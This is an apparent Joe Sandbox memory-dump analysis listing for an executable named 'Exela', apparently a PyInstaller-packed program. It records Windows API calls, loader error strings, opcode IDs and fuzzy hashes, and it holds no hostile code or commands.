• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
• Instruction ID: 78feb41d75a3293f6ab0b4f41554626afb7dac9ebbe7d0ad77107303d32e2d9b
• Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
• Instruction Fuzzy Hash: 15119E22B14F158AFB00EF60E8562B873A4FB08718F880E30DA2D427A4DF3CD4548390
APIs
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
• Instruction ID: cbbfddbd36d80d8de1e52f177d6c9af228f59f795a08639a04f07902093c2921
• Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
• Instruction Fuzzy Hash: 73B09220E07B17C2FA483B296C8721862A47F48701FDC42B8C01C40330DE3C28E55720
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Strings
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 199729137-3427451314
APIs
  • Part of subcall function 00007FF75AE99400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF75AE945E4,00000000,00007FF75AE91985), ref: 00007FF75AE99439
• ExpandEnvironmentStringsW.KERNEL32(?,00007FF75AE988A7,?,?,00000000,00007FF75AE93CBB), ref: 00007FF75AE9821C
  • Part of subcall function 00007FF75AE92810: MessageBoxW.USER32 ref: 00007FF75AE928EA
Strings
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
• API String ID: 1662231829-930877121
APIs
Strings
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
Similarity
• API ID: MoveWindow$ObjectSelect$DrawReleaseText
• String ID: P%
• API String ID: 2147705588-2959514604
APIs
Strings
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
Similarity
• API ID: LongWindow$BlockCreateErrorLastReasonShutdown
• String ID: Needs to remove its temporary files.
• API String ID: 3975851968-2863640275
APIs
Strings
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: -$:$f$p$p
• API String ID: 3215553584-2013873522
APIs
Strings
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
• API String ID: 3215553584-1325933183
Strings
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
Strings
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
APIs
Strings
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                    • String ID: csm$csm$csm
                                                                                                    • API String ID: 849930591-393685449
                                                                                                    • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                    • Instruction ID: 0a5312119986de2a4ae3356448189989bfb133cf6c10d7e5d1f2137b66254517
                                                                                                    • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                    • Instruction Fuzzy Hash: 0CD17D62A087618AFB20BB25D4427ADA7A0FF45798F980176EF4D57B95DF38E480C720
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF75AE93706,?,00007FF75AE93804), ref: 00007FF75AE92C9E
                                                                                                    • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF75AE93706,?,00007FF75AE93804), ref: 00007FF75AE92D63
                                                                                                    • MessageBoxW.USER32 ref: 00007FF75AE92D99
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$CurrentFormatProcess
                                                                                                    • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                    • API String ID: 3940978338-251083826
                                                                                                    • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                    • Instruction ID: 959f39bb468789a468f54dddd02ae54de8f0dc4e02315a1adbe7011854c44fda
                                                                                                    • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                    • Instruction Fuzzy Hash: C0310822B08B6146FB20BB25B8156BBA695BF887C8F844135EF4D93759EF3CD506C710
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF75AE9DFEA,?,?,?,00007FF75AE9DCDC,?,?,?,00007FF75AE9D8D9), ref: 00007FF75AE9DDBD
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF75AE9DFEA,?,?,?,00007FF75AE9DCDC,?,?,?,00007FF75AE9D8D9), ref: 00007FF75AE9DDCB
                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF75AE9DFEA,?,?,?,00007FF75AE9DCDC,?,?,?,00007FF75AE9D8D9), ref: 00007FF75AE9DDF5
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF75AE9DFEA,?,?,?,00007FF75AE9DCDC,?,?,?,00007FF75AE9D8D9), ref: 00007FF75AE9DE63
                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF75AE9DFEA,?,?,?,00007FF75AE9DCDC,?,?,?,00007FF75AE9D8D9), ref: 00007FF75AE9DE6F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                    • String ID: api-ms-
                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                    • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                    • Instruction ID: 70f55dac4288e69f14614064eb164a04cbd27b1be7e9a2bf35709ba27e867ea7
                                                                                                    • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                    • Instruction Fuzzy Hash: 4C318B21B1A76699FE12BB02A842975A394FF58BA0FCD4675EE1D46380EF3CE4448230
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess
                                                                                                    • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                    • API String ID: 2050909247-2434346643
                                                                                                    • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                    • Instruction ID: 42dc910226e0dc196919365218f4cb73e4c3f8ff7adc36aeca7154002c201508
                                                                                                    • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                    • Instruction Fuzzy Hash: 27419231A1C79795FA11FB60E4566E9A310FF88384FC80172EA5C53296EF3CE905C760
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF75AE9351A,?,00000000,00007FF75AE93F23), ref: 00007FF75AE92AA0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess
                                                                                                    • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                    • API String ID: 2050909247-2900015858
                                                                                                    • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                    • Instruction ID: 104efb88683b7cc3f511a7c5883d8de4f14563315119a7727c20c07082a29446
                                                                                                    • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                    • Instruction Fuzzy Hash: 7221A132A1879186F720FB50B8467E6A394FF883C4F844172EE8C53659DF3CD5458750
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 2506987500-0
                                                                                                    • Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                    • Instruction ID: ba8b0cf157a6c32acbdf2a6c46c18d5112196af08dbe314014990bb34dddbea8
                                                                                                    • Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                    • Instruction Fuzzy Hash: 04219F20F0C26681FA687365666B17DE1425F447B0FCC87B5D87E07AD6DE2CAC008330
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                    • String ID: CONOUT$
                                                                                                    • API String ID: 3230265001-3130406586
                                                                                                    • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                    • Instruction ID: 2c81a9dbc2c33c5e6d231d570e7c84dd3b2bbe5d00d45cdf34c4e5d48f380132
                                                                                                    • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                    • Instruction Fuzzy Hash: AE118121A18B5586F350BB56F85A329B2A4FF88BE4F884374EA5D877A4DF3CD8048750
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF75AE99216), ref: 00007FF75AE98592
                                                                                                    • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF75AE99216), ref: 00007FF75AE985E9
                                                                                                      • Part of subcall function 00007FF75AE99400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF75AE945E4,00000000,00007FF75AE91985), ref: 00007FF75AE99439
                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF75AE99216), ref: 00007FF75AE98678
                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF75AE99216), ref: 00007FF75AE986E4
                                                                                                    • FreeLibrary.KERNEL32(?,?,00000000,00007FF75AE99216), ref: 00007FF75AE986F5
                                                                                                    • FreeLibrary.KERNEL32(?,?,00000000,00007FF75AE99216), ref: 00007FF75AE9870A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 3462794448-0
                                                                                                    • Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                    • Instruction ID: cdfa6a96291e7e34f18fbfe516444fb18322a8224da3d27bdaff509dc0fe0cd1
                                                                                                    • Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                    • Instruction Fuzzy Hash: 9141C462B1879249FB30BF11A446AAAA794FF84BC4F880175DF8D97B99DE3CD401C720
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF75AEA4F81,?,?,?,?,00007FF75AEAA4FA,?,?,?,?,00007FF75AEA71FF), ref: 00007FF75AEAB347
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEA4F81,?,?,?,?,00007FF75AEAA4FA,?,?,?,?,00007FF75AEA71FF), ref: 00007FF75AEAB37D
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEA4F81,?,?,?,?,00007FF75AEAA4FA,?,?,?,?,00007FF75AEA71FF), ref: 00007FF75AEAB3AA
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEA4F81,?,?,?,?,00007FF75AEAA4FA,?,?,?,?,00007FF75AEA71FF), ref: 00007FF75AEAB3BB
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEA4F81,?,?,?,?,00007FF75AEAA4FA,?,?,?,?,00007FF75AEA71FF), ref: 00007FF75AEAB3CC
                                                                                                    • SetLastError.KERNEL32(?,?,?,00007FF75AEA4F81,?,?,?,?,00007FF75AEAA4FA,?,?,?,?,00007FF75AEA71FF), ref: 00007FF75AEAB3E7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 2506987500-0
                                                                                                    • Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                    • Instruction ID: 48c53db4bde8173b0a260965429a9b6dc620d5db89f6430af7bf9dd2a7dc8010
                                                                                                    • Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                    • Instruction Fuzzy Hash: 4A11A530B0D3A286FA54732156AB17DE1429F447B0FCC87B4D87E477C6DE6CA8018321
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF75AE91B6A), ref: 00007FF75AE9295E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess
                                                                                                    • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                    • API String ID: 2050909247-2962405886
                                                                                                    • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                    • Instruction ID: 463e3f84d6fc8cba43a1c3aac15551f7fe014ca6b74a80956e717a4faaaa7aa3
                                                                                                    • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                    • Instruction Fuzzy Hash: 71313823B1879156F720B761A8426E6A294BF887D4F844172FE8D83745EF3CD546C720
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                    • String ID: Unhandled exception in script
                                                                                                    • API String ID: 3081866767-2699770090
                                                                                                    • Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                    • Instruction ID: 27f75de02e02f740de3505eef975b10c5753f190785946dfa57723bbaa08ed94
                                                                                                    • Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                    • Instruction Fuzzy Hash: 7E315D62619B928DFB20FB21E85A2FAA360FF88784F884175EA4D47A59DF3CD5008710
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF75AE9918F,?,00007FF75AE93C55), ref: 00007FF75AE92BA0
                                                                                                    • MessageBoxW.USER32 ref: 00007FF75AE92C2A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
